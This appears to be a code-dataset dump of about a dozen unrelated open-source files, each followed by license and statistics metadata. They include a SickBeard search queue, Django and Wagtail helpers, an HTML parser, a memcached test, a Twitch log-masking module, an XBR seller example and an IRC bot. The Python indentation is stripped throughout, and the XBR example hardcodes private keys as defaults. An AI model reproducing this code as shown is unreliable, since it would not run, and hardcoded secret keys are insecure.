with ep.lock:
# Now that it is time, change state of UNAIRED show into expected or skipped
ep.status = (common.WANTED, common.SKIPPED)[ep.show.paused]
result = ep.get_sql()
if None is not result:
sql_l.append(result)
wanted |= (False, True)[common.WANTED == ep.status]
else:
logger.log(u'No unaired episodes marked wanted')
if 0 < len(sql_l):
myDB = db.DBConnection()
myDB.mass_action(sql_l)
if wanted:
logger.log(u'Found new episodes marked wanted')
@staticmethod
def update_providers():
origThreadName = threading.currentThread().name
threads = []
logger.log('Updating provider caches with recent upload data')
providers = [x for x in sickbeard.providers.sortedProviderList() if x.is_active() and x.enable_recentsearch]
for curProvider in providers:
# spawn separate threads for each provider so we don't need to wait for providers with slow network operation
threads.append(threading.Thread(target=curProvider.cache.updateCache, name=origThreadName +
' :: [' + curProvider.name + ']'))
# start the thread we just created
threads[-1].start()
# wait for all threads to finish
for t in threads:
t.join()
logger.log('Finished updating provider caches')
class ProperSearchQueueItem(generic_queue.QueueItem):
def __init__(self):
generic_queue.QueueItem.__init__(self, 'Proper Search', PROPER_SEARCH)
self.priority = generic_queue.QueuePriorities.HIGH
self.success = None
def run(self):
generic_queue.QueueItem.run(self)
try:
properFinder.searchPropers()
finally:
self.finish()
class ManualSearchQueueItem(generic_queue.QueueItem):
def __init__(self, show, segment):
generic_queue.QueueItem.__init__(self, 'Manual Search', MANUAL_SEARCH)
self.priority = generic_queue.QueuePriorities.HIGH
self.name = 'MANUAL-' + str(show.indexerid)
self.success = None
self.show = show
self.segment = segment
self.started = None
def run(self):
generic_queue.QueueItem.run(self)
try:
logger.log('Beginning manual search for: [' + self.segment.prettyName() + ']')
self.started = True
searchResult = search.searchProviders(self.show, [self.segment], True)
if searchResult:
# just use the first result for now
logger.log(u'Downloading ' + searchResult[0].name + ' from ' + searchResult[0].provider.name)
self.success = search.snatchEpisode(searchResult[0])
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
else:
ui.notifications.message('No downloads were found',
'Couldn\'t find a download for <i>%s</i>' % self.segment.prettyName())
logger.log(u'Unable to find a download for: [' + self.segment.prettyName() + ']')
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
finally:
### Keep a list with the 100 last executed searches
fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)
if self.success is None:
self.success = False
self.finish()
class BacklogQueueItem(generic_queue.QueueItem):
def __init__(self, show, segment, standard_backlog=False, limited_backlog=False, forced=False):
generic_queue.QueueItem.__init__(self, 'Backlog', BACKLOG_SEARCH)
self.priority = generic_queue.QueuePriorities.LOW
self.name = 'BACKLOG-' + str(show.indexerid)
self.success = None
self.show = show
self.segment = segment
self.standard_backlog = standard_backlog
self.limited_backlog = limited_backlog
self.forced = forced
def run(self):
generic_queue.QueueItem.run(self)
try:
logger.log('Beginning backlog search for: [' + self.show.name + ']')
searchResult = search.searchProviders(self.show, self.segment, False)
if searchResult:
for result in searchResult:
# just use the first result for now
logger.log(u'Downloading ' + result.name + ' from ' + result.provider.name)
search.snatchEpisode(result)
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
else:
logger.log(u'No needed episodes found during backlog search for: [' + self.show.name + ']')
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
finally:
self.finish()
class FailedQueueItem(generic_queue.QueueItem):
def __init__(self, show, segment):
generic_queue.QueueItem.__init__(self, 'Retry', FAILED_SEARCH)
self.priority = generic_queue.QueuePriorities.HIGH
self.name = 'RETRY-' + str(show.indexerid)
self.show = show
self.segment = segment
self.success = None
self.started = None
def run(self):
generic_queue.QueueItem.run(self)
self.started = True
try:
for epObj in self.segment:
logger.log(u'Marking episode as bad: [' + epObj.prettyName() + ']')
failed_history.markFailed(epObj)
(release, provider) = failed_history.findRelease(epObj)
if release:
failed_history.logFailed(release)
history.logFailed(epObj, release, provider)
failed_history.revertEpisode(epObj)
logger.log('Beginning failed download search for: [' + epObj.prettyName() + ']')
searchResult = search.searchProviders(self.show, self.segment, True)
if searchResult:
for result in searchResult:
# just use the first result for now
logger.log(u'Downloading ' + result.name + ' from ' + result.provider.name)
search.snatchEpisode(result)
# give the CPU a break
time.sleep(common.cpu_presets[sickbeard.CPU_PRESET])
else:
pass
#logger.log(u"No valid episode found to retry for: [" + self.segment.prettyName() + "]")
except Exception:
logger.log(traceback.format_exc(), logger.DEBUG)
finally:
### Keep a list with the 100 last executed searches
fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)
if self.success is None:
self.success = False
self.finish()
def fifo(myList, item, maxSize = 100):
if len(myList) >= maxSize:
myList.pop(0)
myList.append(item)
| gpl-3.0 | 3,014,968,864,450,407,000 | 37.611231 | 179 | 0.578565 | false | 4.336972 | false | false | false |
MERegistro/meregistro | meregistro/apps/registro/forms/ExtensionAulicaModificarCueForm.py | 1 | 1137 | # -*- coding: utf-8 -*-
from django.forms import ModelForm
from apps.registro.models import ExtensionAulica, Establecimiento
from apps.registro.forms import ExtensionAulicaCreateForm
from django.core.exceptions import ValidationError
from django import forms
class ExtensionAulicaModificarCueForm(ExtensionAulicaCreateForm):
class Meta:
model = ExtensionAulica
fields = ['codigo_tipo_unidad_educativa', 'cue', 'codigo_jurisdiccion']
def __init__(self, *args, **kwargs):
super(ExtensionAulicaModificarCueForm, self).__init__(*args, **kwargs)
self.fields['norma_creacion'].required = False
def clean(self):
# Armar el CUE correctamente
cleaned_data = self.cleaned_data
try:
cue = str(cleaned_data['cue'])
codigo_jurisdiccion = cleaned_data['codigo_jurisdiccion']
codigo_tipo_unidad_educativa = cleaned_data['codigo_tipo_unidad_educativa']
cleaned_data['cue'] = str(codigo_jurisdiccion) + str(cue) + str(codigo_tipo_unidad_educativa)
except KeyError:
pass
return cleaned_data
| bsd-3-clause | 2,083,545,406,543,251,000 | 34.53125 | 105 | 0.672823 | false | 3.520124 | false | false | false |
svarnypetr/focusWebCrawler | parser.py | 1 | 5517 | from HTMLParser import HTMLParser
from htmlentitydefs import name2codepoint
class Tag(object):
name = ''
text = ''
first_child = 0
parent = 0
next_sibling = 0
closed = 0
depth = 0
def get_tag_info_str(self):
c, p, s = 'none', 'none', 'none'
if self.first_child != 0:
c = self.first_child.name
if self.parent != 0:
p = self.parent.name
if self.next_sibling != 0:
s = self.next_sibling.name
return "name = {}, text = {}\nParent = {}, First Child = {}, Next Sibling = {}\nClosed = {}, Depth = {}\n".format(self.name, self.text, p, c, s, self.closed, self.depth)
class MyHTMLParser(HTMLParser):
tag_list = []
depth = 0
previous_tag = 'none'
mode = 'silent'
def handle_starttag(self, tag, attrs):
if self.mode != 'silent':
print "Start tag:", tag
for attr in attrs:
print " attr:", attr
self.depth = self.depth + 1
t = Tag()
t.name = tag
t.depth = self.depth
if self.previous_tag == 'start':
# current tag is a first child of the last tag
t.parent = self.tag_list[len(self.tag_list)-1]
self.tag_list[len(self.tag_list)-1].first_child = t
elif self.previous_tag == 'end':
# current tag is next sibling of the last tag
for x in reversed(self.tag_list):
if x.depth == self.depth:
x.next_sibling = t
if t.parent == 0:
t.parent = x.parent
break
elif self.previous_tag == 'startend':
# current tag is the next sibling of the previous tag
t.parent = self.tag_list[len(self.tag_list)-1].parent
self.tag_list[len(self.tag_list)-1].next_sibling = t
self.tag_list.append(t)
self.previous_tag = 'start'
def handle_endtag(self, tag):
if self.mode != 'silent':
print "End tag :", tag
for x in reversed(self.tag_list):
if x.name == tag and x.closed == 0:
x.closed = 1
break
self.depth = self.depth - 1
self.previous_tag = 'end'
def handle_startendtag(self, tag, attrs):
if self.mode != 'silent':
print "Start/End tag :", tag
for attr in attrs:
print " attr:", attr
t = Tag()
self.depth = self.depth + 1
t.name = tag
t.depth = self.depth
t.closed = 1
if self.previous_tag == 'start':
# current tag is first child of the last tag
t.parent = self.tag_list[len(self.tag_list)-1]
self.tag_list[len(self.tag_list)-1].first_child = t
elif self.previous_tag == 'startend':
# current tag is next sibling of last tag
t.parent = self.tag_list[len(self.tag_list)-1].parent
self.tag_list[len(self.tag_list)-1].next_sibling = t
elif self.previous_tag == 'end':
#current tag is next sibling of a previous tag of depth=self.depth
for x in reversed(self.tag_list):
if x.depth == self.depth:
x.next_sibling = t
if t.parent == 0:
t.parent = x.parent
break
self.tag_list.append(t)
self.depth = self.depth - 1
self.previous_tag = 'startend'
def handle_data(self, data):
if self.mode != 'silent':
print "Data :", data
self.depth = self.depth + 1
# add data to last tag in list with depth = current depth - 1
for x in reversed(self.tag_list):
if x.depth == self.depth - 1:
x.text = (x.text + ' ' + data.strip(' \n\t')).strip(' \n\t')
break
self.depth = self.depth - 1
def handle_comment(self, data):
if self.mode != 'silent':
print "Comment :", data
def handle_entityref(self, name):
if self.mode != 'silent':
c = unichr(name2codepoint[name])
print "Named ent:", c
def handle_charref(self, name):
if self.mode != 'silent':
if name.startswith('x'):
c = unichr(int(name[1:], 16))
else:
c = unichr(int(name))
print "Num ent :", c
def handle_decl(self, data):
if self.mode != 'silent':
print "Decl :", data
def print_tag_list(self, u):
for l in self.tag_list:
print l.get_tag_info_str()
def clear_tag_list(self):
self.tag_list.__delslice__(0, len(self.tag_list))
def pretty_print_tags(self):
for t in self.tag_list:
s = ''
s = s + self.get_indent_str(t.depth-1)
s = s + self.get_tag_str(t.name)
print s
def get_indent_str(self, n):
s = ''
while(n != 0):
s = s + ' '
n = n - 1
return s
def get_tag_str(self, name):
return '<{}>'.format(name)
def find_first_tag(self, name):
r = 0
for t in self.tag_list:
if t.name == name:
r = t
break
return r
def print_first_tag_info(self, name):
t = self.find_first_tag(name)
if t == 0:
print "Tag: {} not found".format(name)
else:
print t.get_tag_info_str()
| mit | 821,630,544,457,962,000 | 30.525714 | 177 | 0.496828 | false | 3.707661 | false | false | false |
1N50MN14/rethinkdb | test/memcached_workloads/rget_no_blocking.py | 4 | 4069 | #!/usr/bin/python
# Copyright 2010-2012 RethinkDB, all rights reserved.
import os, sys, socket, random, time
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir, "common")))
import memcached_workload_common
from line import *
key_padding = ''.zfill(20)
def gen_key(prefix, num):
return prefix + key_padding + str(num).zfill(6)
value_padding = ''.zfill(240)
large_value_padding = ''.zfill(512)
def gen_value(prefix, num):
if num % 5 == 4:
return prefix + large_value_padding + str(num).zfill(6)
else:
return prefix + value_padding + str(num).zfill(6)
def sock_readline(sock_file):
ls = []
while True:
l = sock_file.readline()
ls.append(l)
if len(l) >= 2 and l[-2:] == '\r\n':
break
return ''.join(ls)
value_line = line("^VALUE\s+([^\s]+)\s+(\d+)\s+(\d+)\r\n$", [('key', 's'), ('flags', 'd'), ('length', 'd')])
def get_results(s):
res = []
f = s.makefile()
while True:
l = sock_readline(f)
if l == 'END\r\n':
break
val_def = value_line.parse_line(l)
if not val_def:
raise ValueError("received unexpected line from rget: %s" % l)
val = sock_readline(f).rstrip()
if len(val) != val_def['length']:
raise ValueError("received value of unexpected length (expected %d, got %d: '%s')" % (val_def['length'], len(val), val))
res.append({'key': val_def['key'], 'value': val})
return res
class TimeoutException(Exception):
pass
op = memcached_workload_common.option_parser_for_socket()
opts = op.parse(sys.argv)
# Test:
# start rget query, then start a write concurrently (but after rget got to the bottom of the tree)
# if the write blocks, then we do not do copy-on-write/snapshotting/etc.
# Also check that rget gets consistent data (i.e. is not affected by concurrent write), and that
# the write actually updates the data
rget_keys = 10000
updated_key_id = rget_keys-1
updated_key = gen_key('foo', updated_key_id)
updated_value = gen_value('changed', updated_key_id)
orig_value = gen_value('foo', updated_key_id)
host, port = opts["address"]
with memcached_workload_common.MemcacheConnection(host, port) as mc:
print "Creating test data"
for i in range(0, rget_keys):
mc.set(gen_key('foo', i), gen_value('foo', i))
with memcached_workload_common.make_socket_connection(opts) as s:
print "Starting rget"
s.send('rget %s %s %d %d %d\r\n' % (gen_key('foo', 0), gen_key('fop', 0), 0, 1, rget_keys))
print "Started rget"
# we don't read the data, we just stop here, preventing rget from proceding
# rget is slow to start, so we need to wait a bit, before it locks down the path.
# This is a crude way, but is probably the simplest
time.sleep(5)
with memcached_workload_common.make_socket_connection(opts) as us:
print "Starting concurrent update"
us.setblocking(1)
print " Sending concurrent set"
us.send('set %s 0 0 %d\r\n%s\r\n' % (updated_key, len(updated_value), updated_value))
uf = us.makefile()
us.settimeout(10.0)
print " Waiting for set result"
set_res = sock_readline(uf).rstrip()
if set_res != 'STORED':
raise ValueError("update failed: %s" % set_res)
print " Concurrent set finished"
v = mc.get(updated_key)
if v != updated_value:
raise ValueError("update didn't take effect")
res = get_results(s)
if len(res) != rget_keys:
raise ValueError("received unexpected number of results from rget (expected %d, got %d)" % (rget_keys, len(res)))
if res[updated_key_id]['value'] != orig_value:
raise ValueError("rget results are not consistent (update changed the contents of a part of running rget query)")
v = mc.get(updated_key)
if v != updated_value:
raise ValueError("update didn't take effect")
print "Done"
| agpl-3.0 | 7,748,596,986,973,659,000 | 34.692982 | 132 | 0.609978 | false | 3.368377 | false | false | false |
MrSprigster/script.module.python.twitch | resources/lib/twitch/log.py | 1 | 3253 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2016-2018 script.module.python.twitch
This file is part of script.module.python.twitch
SPDX-License-Identifier: GPL-3.0-only
See LICENSES/GPL-3.0-only for more information.
"""
import re
import logging
import copy
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
try:
import xbmc
except ImportError:
xbmc = None
def _mask(message):
mask = '*' * 11
masked_message = re.sub(r'((?:OAuth|Bearer)\s)[^\'"]+', r'\1' + mask, message)
masked_message = re.sub(r'(["\']email["\']:\s*[\'"])[^\'"]+', r'\1' + mask, masked_message)
masked_message = re.sub(r'(USER-IP=[\'"])[^\'"]+', r'\1' + mask, masked_message)
masked_message = re.sub(r'(["\']client_secret["\']:\s*[\'"])[^\'"]+', r'\1' + mask, masked_message)
masked_message = re.sub(r'(client_secret=).+?(&|$|\|)', r'\1' + mask + r'\2', masked_message)
masked_message = re.sub(r'(\\*["\']user_ip\\*["\']:\\*["\']).+?(\\*["\'])', r'\1' + mask + r'\2', masked_message)
masked_message = re.sub(r'(["\'](?:nauth)*sig["\']: ["\'])[^\'"]+', r'\1' + mask, masked_message)
return masked_message
def _add_leader(message):
if xbmc:
message = 'script.module.python.twitch: %s' % message
return message
def prep_log_message(message):
message = copy.deepcopy(message)
message = _mask(message)
message = _add_leader(message)
return message
class Log:
def __init__(self):
if xbmc:
self._log = xbmc.log
else:
self._log = logging.getLogger('twitch')
self._log.addHandler(NullHandler())
def info(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGINFO)
else:
self._log.info(message)
def debug(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGDEBUG)
else:
self._log.debug(message)
def warning(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGWARNING)
else:
self._log.debug(message)
def error(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGERROR)
else:
self._log.error(message)
def critical(self, message):
message = prep_log_message(message)
if xbmc:
self._log(message, xbmc.LOGFATAL)
else:
self._log.critical(message)
def deprecated_query(self, old, new=None):
if new:
self.warning('DEPRECATED call to |{0}| detected, please use |{1}| instead'.format(old, new))
else:
self.warning('DEPRECATED call to |{0}| detected, no alternatives available'.format(old))
def deprecated_endpoint(self, old):
self.warning('DEPRECATED call to |{0}| endpoint detected'.format(old))
def deprecated_api_version(self, old, new, eol_date):
self.warning('API version |{0}| is deprecated, update to |{1}| by |{2}|'.format(old, new, eol_date))
log = Log()
| gpl-3.0 | -9,018,918,745,666,006,000 | 28.572727 | 117 | 0.571165 | false | 3.456961 | false | false | false |
Mchakravartula/rockstor-core | src/rockstor/storageadmin/models/pool_balance.py | 4 | 1243 | """
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.db import models
from storageadmin.models import Pool
class PoolBalance(models.Model):
pool = models.ForeignKey(Pool)
status = models.CharField(max_length=10, default='started')
#django ztask uuid
tid = models.CharField(max_length=36, null=True)
message = models.CharField(max_length=1024, null=True)
start_time = models.DateTimeField(auto_now=True)
end_time = models.DateTimeField(null=True)
percent_done = models.IntegerField(default=0)
class Meta:
app_label = 'storageadmin'
| gpl-3.0 | 5,840,038,939,599,115,000 | 34.514286 | 68 | 0.752212 | false | 3.824615 | false | false | false |
kingsdigitallab/kdl-django | cms/templatetags/cms_tags.py | 1 | 2265 | from django import template
import random
register = template.Library()
@register.filter
def shuffle(arg):
aux = list(arg)[:]
random.shuffle(aux)
return aux
@register.assignment_tag(takes_context=True)
def get_request_parameters(context, exclude=None):
"""Returns a string with all the request parameters except the exclude
parameter."""
params = ''
request = context['request']
for key, value in request.GET.items():
if key != exclude:
params += '&{key}={value}'.format(key=key, value=value)
return params
@register.assignment_tag(takes_context=True)
def get_site_root(context):
"""Returns the site root Page, not the implementation-specific model used.
Object-comparison to self will return false as objects would differ.
:rtype: `wagtail.wagtailcore.models.Page`
"""
return context['request'].site.root_page
@register.inclusion_tag('cms/tags/main_menu.html', takes_context=True)
def main_menu(context, root, current_page=None):
"""Returns the main menu items, the children of the root page. Only live
pages that have the show_in_menus setting on are returned."""
menu_pages = root.get_children().live().in_menu()
root.active = (current_page.url == root.url
if current_page else False)
for page in menu_pages:
page.active = (current_page.url.startswith(page.url)
if current_page else False)
return {'request': context['request'], 'root': root,
'current_page': current_page, 'menu_pages': menu_pages}
@register.inclusion_tag('cms/tags/footer_menu.html', takes_context=True)
def footer_menu(context, root, current_page=None):
"""Returns the main menu items, the children of the root page. Only live
pages that have the show_in_menus setting on are returned."""
menu_pages = root.get_children().live().in_menu()
root.active = (current_page.url == root.url
if current_page else False)
for page in menu_pages:
page.active = (current_page.url.startswith(page.url)
if current_page else False)
return {'request': context['request'], 'root': root,
'current_page': current_page, 'menu_pages': menu_pages}
| mit | -278,838,461,996,839,740 | 31.826087 | 78 | 0.660927 | false | 3.878425 | false | false | false |
mozts2005/OuterSpace | client-pygame/lib/osci/dialog/ChangeQtyDlg.py | 1 | 2682 | #
# Copyright 2001 - 2006 Ludek Smid [http://www.ospace.net/]
#
# This file is part of IGE - Outer Space.
#
# IGE - Outer Space is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# IGE - Outer Space is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with IGE - Outer Space; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
import pygameui as ui
from osci import client, gdata, res
class ChangeQtyDlg:
def __init__(self, app):
self.app = app
self.createUI()
def display(self, quantity, confirmAction = None):
self.confirmAction = confirmAction
self.win.vQuantity.text = str(quantity)
self.win.show()
self.app.setFocus(self.win.vQuantity)
# register for updates
if self not in gdata.updateDlgs:
gdata.updateDlgs.append(self)
def hide(self):
self.win.setStatus(_("Ready."))
self.win.hide()
# unregister updates
if self in gdata.updateDlgs:
gdata.updateDlgs.remove(self)
def update(self):
self.show()
def onOK(self, widget, action, data):
try:
self.quantity = int(self.win.vQuantity.text)
except ValueError:
self.win.setStatus(_("Specify quantity (1, 2, 3, ...)."))
return
self.hide()
if self.confirmAction:
self.confirmAction()
def onCancel(self, widget, action, data):
self.quantity = None
self.hide()
def createUI(self):
w, h = gdata.scrnSize
self.win = ui.Window(self.app,
modal = 1,
escKeyClose = 1,
movable = 0,
title = _('Change quantity'),
rect = ui.Rect((w - 264) / 2, (h - 104) / 2, 264, 104),
layoutManager = ui.SimpleGridLM(),
)
# creating dialog window
self.win.subscribeAction('*', self)
ui.Label(self.win,
text = _("New quantity:"),
align = ui.ALIGN_E,
layout = (0, 1, 6, 1)
)
ui.Entry(self.win, id = 'vQuantity',
align = ui.ALIGN_W,
layout = (6, 1, 3, 1),
#text = self.quantity,
)
ui.Title(self.win, layout = (0, 3, 3, 1))
ui.TitleButton(self.win, layout = (3, 3, 5, 1), text = _("Cancel"), action = "onCancel")
okBtn = ui.TitleButton(self.win, layout = (8, 3, 5, 1), text = _("OK"), action = 'onOK')
self.win.acceptButton = okBtn | gpl-2.0 | -9,214,543,163,955,698,000 | 28.157303 | 90 | 0.64877 | false | 3.02027 | false | false | false |
crossbario/crossbar-examples | xbr/teststack1/python/seller.py | 3 | 2590 | import binascii
import os
from uuid import UUID
import txaio
txaio.use_twisted()
from autobahn.twisted.component import Component, run
from autobahn.twisted.util import sleep
from autobahn.twisted.xbr import SimpleSeller
from autobahn.wamp.types import PublishOptions
market_maker_adr = os.environ.get('XBR_MARKET_MAKER_ADR', '0x3e5e9111ae8eb78fe1cc3bb8915d5d461f3ef9a9')
print('market_maker_adr', market_maker_adr)
market_maker_adr = binascii.a2b_hex(market_maker_adr[2:])
seller_priv_key = os.environ.get('XBR_SELLER_PRIVKEY', '0xadd53f9a7e588d003326d1cbf9e4a43c061aadd9bc938c843a79e7b4fd2ad743')
print('seller_priv_key', seller_priv_key)
seller_priv_key = binascii.a2b_hex(seller_priv_key[2:])
comp = Component(
transports=os.environ.get('XBR_INSTANCE', 'ws://edge1:8080/ws'),
realm=os.environ.get('XBR_REALM', 'realm1'),
extra={
'market_maker_adr': market_maker_adr,
'seller_privkey': seller_priv_key,
}
)
running = False
@comp.on_join
async def joined(session, details):
print('Seller session joined', details)
global running
running = True
# market_maker_adr = binascii.a2b_hex(session.config.extra['market_maker_adr'][2:])
market_maker_adr = session.config.extra['market_maker_adr']
print('Using market maker adr:', session.config.extra['market_maker_adr'])
# seller_privkey = binascii.a2b_hex(session.config.extra['seller_privkey'][2:])
seller_privkey = session.config.extra['seller_privkey']
api_id = UUID('627f1b5c-58c2-43b1-8422-a34f7d3f5a04').bytes
topic = 'io.crossbar.example'
counter = 1
seller = SimpleSeller(market_maker_adr, seller_privkey)
price = 35 * 10 ** 18
interval = 10
seller.add(api_id, topic, price, interval, None)
balance = await seller.start(session)
balance = int(balance / 10 ** 18)
print("Remaining balance: {} XBR".format(balance))
while running:
payload = {'data': 'py-seller', 'counter': counter}
key_id, enc_ser, ciphertext = await seller.wrap(api_id,
topic,
payload)
pub = await session.publish(topic, key_id, enc_ser, ciphertext,
options=PublishOptions(acknowledge=True))
print('Published event {}: {}'.format(pub.id, payload))
counter += 1
await sleep(1)
@comp.on_leave
def left(session, details):
print('Seller session left', details)
global running
running = False
if __name__ == '__main__':
run([comp])
| apache-2.0 | -5,349,200,474,632,949,000 | 29.833333 | 124 | 0.654054 | false | 3.112981 | false | false | false |
khchine5/lino-welfare | lino_welfare/modlib/badges/models.py | 1 | 2307 | # -*- coding: UTF-8 -*-
# Copyright 2014-2015 Luc Saffre
# This file is part of Lino Welfare.
#
# Lino Welfare is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Lino Welfare is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with Lino Welfare. If not, see
# <http://www.gnu.org/licenses/>.
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
logger = logging.getLogger(__name__)
from django.db import models
from django.utils.translation import ugettext_lazy as _
from lino.api import dd
from lino import mixins
config = dd.plugins.badges
class Badge(mixins.BabelNamed):
class Meta:
verbose_name = _("Badge")
verbose_name_plural = _("Badges")
class Badges(dd.Table):
model = 'badges.Badge'
required_roles = dd.login_required(dd.SiteStaff)
class Award(dd.Model):
class Meta:
verbose_name = _("Badge Award")
verbose_name_plural = _("Badge Awards")
holder = dd.ForeignKey(
config.holder_model,
verbose_name=_("Holder"))
badge = dd.ForeignKey('badges.Badge')
date = models.DateField(
_("Date"), default=dd.today)
result = models.CharField(
_("Result"),
blank=True, max_length=200)
remark = models.CharField(
_("Remark"),
blank=True, max_length=200)
class Awards(dd.Table):
model = 'badges.Award'
required_roles = dd.login_required(dd.SiteStaff)
class AwardsByHolder(Awards):
label = _("Awards")
required_roles = dd.login_required()
master_key = 'holder'
column_names = 'date badge result remark'
auto_fit_column_widths = True
class AwardsByBadge(Awards):
label = _("Awards")
required_roles = dd.login_required()
master_key = 'badge'
column_names = 'date holder result remark'
auto_fit_column_widths = True
| agpl-3.0 | 3,762,063,786,132,441,000 | 25.517241 | 70 | 0.680971 | false | 3.582298 | false | false | false |
BGS/Rogentos-Irc-Bot | bot.py | 1 | 6177 | '''
Rogentos IrcBot: Irc Bot
Copyright (C) Blaga Florentin Gabriel
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
#! /usr/bin/env Python
import socket
import sys
import datetime
from time import sleep
root_admins = ["bgs", "blacknoxis"]
class BotCore:
def __init__(self, host, port, nick, channel, password=""):
self.irc_host = host
self.irc_port = port
self.irc_nick = nick
self.irc_channel = channel
self.joined_channels = []
self.irc_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.is_connected = False
self.reconnect = False
self.command = ""
self.connect()
def connect(self):
self.reconnect = True
try:
self.irc_sock.connect (( self.irc_host, self.irc_port))
except:
print ("Error: Could not connect to IRC; Host: %s Port: %s" % (self.irc_host, self.irc_port))
print ("Connected to: %s:%s" %(self.irc_host,self.irc_port))
self.irc_sock.send("USER %s %s %s :This bot belongs to BGS.\n" % (self.irc_nick, self.irc_nick, self.irc_nick))
self.irc_sock.send("NICK %s\n" % self.irc_nick)
self.irc_sock.send("JOIN %s\n" % self.irc_channel)
self.is_connected = True
self.listen()
def listen(self):
while self.is_connected:
recv = self.irc_sock.recv(4096)
recv = recv.strip('\n\r')
print recv
if str(recv).find ("PING") != -1:
self.irc_sock.send("PONG :pingis\n")
if str(recv).find ("JOIN") != -1:
irc_user_nick = str(recv).split()[0].split('!')[0].split(':')[1]
channel = str(recv).split()[2]
if channel == self.irc_channel and irc_user_nick != self.irc_nick:
self.send_message_to_channel("""Bine ai venit %s pe canalul %s! \n""" % (irc_user_nick, channel) , channel)
if str(recv).find ("PRIVMSG") != -1:
self.irc_user_nick = str(recv).split()[0].split('!')[0].split(':')[1]
irc_user_message = self.message_to_data(str(recv))
print ( self.irc_user_nick + ": " + ''.join(irc_user_message))
try:
if (''.join(irc_user_message)[0] == "."):
if str(recv).split()[2] == self.irc_nick:
self.command = ''.join(irc_user_message)[1:]
self.process_command(self.irc_user_nick.lower(), self.irc_channel)
else:
self.command = ''.join(irc_user_message)[1:]
self.process_command(self.irc_user_nick.lower(), ((str(recv)).split()[2]))
except IndexError:
pass
if self.reconnect:
self.connect()
def message_to_data(self, message):
data = message.split()
data = ' '.join(data[3:]).split(':')[1:]
return data
def send_message_to_channel(self,message,channel):
print (( "%s: %s") % (self.irc_nick, message))
self.irc_sock.send( (("PRIVMSG %s :%s\r\n") % (channel, message)).encode() )
def process_command(self, user, channel):
if (len(self.command.split()) == 0):
return
command = (self.command).lower()
command = command.split()
if (user in root_admins):
if (command[0] == 'help'):
self.send_message_to_channel("""Available Admin Only Commands:\n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel(""".jchs chan1 chan2 chan3 chan4 \n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel("""Join speciffied channels.\n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel(""".gmsg <message> \n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel("""Send a global message to joined channels! \n""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel(""".say <message>""", self.irc_user_nick)
sleep(0.5)
self.send_message_to_channel("""Write message on channel.""", self.irc_user_nick)
if (command[0] == "say"):
self.send_message_to_channel( ' '.join(command[1:]), channel)
if (command[0] == 'jchs'):
channels = command[1:]
for c in channels:
self.irc_sock.send("JOIN %s\n" % c)
self.joined_channels.append(c)
if (command[0] == 'gmsg'):
for c in self.joined_channels:
self.send_message_to_channel( ' '.join(command[1:]), c )
if (command[0] == "hello"):
self.send_message_to_channel("Hello to you too, %s . Today is : %s" % (user, datetime.datetime.now().strftime("%Y-%m-%d %H:%M")), channel)
if (command[0] == "help"):
self.send_message_to_channel("""Available Unprivileged Commands:\n""", self.irc_user_nick)
self.send_message_to_channel(""".hello""", self.irc_user_nick)
self.send_message_to_channel("""Say hi!""", self.irc_user_nick)
if (command[0] == "owner"):
self.send_message_to_channel("""I belong to %s.""" % root_admins[0] , channel)
if __name__ == '__main__':
BotCore("irc.freenode.net", 6667, "DarthNoxis", "#rogentos-dezvoltare")
| gpl-3.0 | 1,544,610,265,993,985,300 | 41.020408 | 151 | 0.54363 | false | 3.648553 | false | false | false |
